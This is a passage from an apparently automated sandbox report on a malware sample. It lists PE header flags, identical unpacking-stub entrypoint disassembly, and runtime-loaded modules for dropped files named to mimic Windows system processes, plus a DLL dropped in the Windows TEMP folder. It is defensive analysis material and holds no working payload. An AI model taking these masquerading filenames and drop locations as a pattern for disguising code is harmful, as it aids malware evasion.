IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9C38A.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9DE16.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9DF9D.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrHelloween.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9C38C.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"services.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4k51k4.exe.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"shell.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Empty.pif\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9C38A.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9DE16.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9DF9D.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"MrHelloween.scr\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9C38C.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"WINLOGON.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"CRYPTSP.DLL\" at base 753a0000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75130000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"ADVAPI32.DLL\" at base 77c30000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"CRYPTBASE.DLL\" at base 75890000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"DWMAPI.DLL\" at base 74280000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"KERNEL32.DLL\" at base 760d0000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"SHELL32.DLL\" at base 76b90000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"OLE32.DLL\" at base 767f0000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"COMCTL32.DLL\" at base 74860000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"OLEAUT32.DLL\" at base 76950000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"CLBCATQ.DLL\" at base 75e70000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 760d0000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"SETUPAPI.DLL\" at base 769f0000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"RPCRT4.DLL\" at base 75dc0000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744e0000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"NTMARTA.DLL\" at base 74e00000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"USER32\" at base 766d0000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"KERNEL32\" at base 760d0000\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f80000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4k51k4.exe\" loaded module \"KERNEL32\" at base 760d0000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4k51k4.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 430000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75130000\n \"4k51k4.exe\" loaded module \"ADVAPI32.DLL\" at base 77c30000\n \"4k51k4.exe\" loaded module \"CRYPTBASE.DLL\" at base 75890000\n \"4k51k4.exe\" loaded module \"DWMAPI.DLL\" at base 74280000\n \"4k51k4.exe\" loaded module \"KERNEL32.DLL\" at base 760d0000\n \"4k51k4.exe\" loaded module \"SHELL32.DLL\" at base 76b90000\n \"4k51k4.exe\" loaded module \"OLE32.DLL\" at base 767f0000\n \"4k51k4.exe\" loaded module \"COMCTL32.DLL\" at base 74860000\n \"4k51k4.exe\" loaded module \"OLEAUT32.DLL\" at base 76950000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 760d0000\n \"4k51k4.exe\" loaded module \"CLBCATQ.DLL\" at base 75e70000\n \"4k51k4.exe\" loaded module \"SETUPAPI.DLL\" at base 769f0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744e0000\n \"4k51k4.exe\" loaded module \"NTMARTA.DLL\" at base 74e00000\n \"4k51k4.exe\" loaded module \"RPCRT4.DLL\" at base 75dc0000\n \"4k51k4.exe\" loaded module \"USER32\" at base 766d0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74650000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 76950000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 758a0000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 753a0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75130000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 77c30000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 75890000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 74280000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 760d0000\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 760d0000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 76b90000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 767f0000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74860000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 75e70000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744e0000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74e00000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 760d0000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 769f0000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 75dc0000\n \"IExplorer.exe\" loaded module \"USER32\" at base 766d0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74650000\n \"4k51k4.exe\" loaded module \"SXS.DLL\" at base 758a0000\n \"4k51k4.exe\" loaded module \"CRYPTSP.DLL\" at base 753a0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f80000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 760d0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 753a0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75130000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 77c30000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75890000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 760d0000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 76b90000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 767f0000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74860000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 76950000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 75e70000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 760d0000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 769f0000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 75dc0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744e0000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74e00000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 766d0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74650000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76950000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 758a0000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 753a0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75130000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 77c30000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75890000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 74280000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 760d0000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 76b90000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 767f0000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74860000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 75e70000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 760d0000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 769f0000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 75dc0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744e0000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74e00000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 766d0000\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 760d0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f80000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 430000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70f80000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 760d0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 430000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 753a0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75130000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 77c30000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75890000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 760d0000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 76b90000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 767f0000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74860000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 76950000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 75e70000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744e0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 760d0000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 769f0000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 75dc0000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74e00000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 766d0000\n 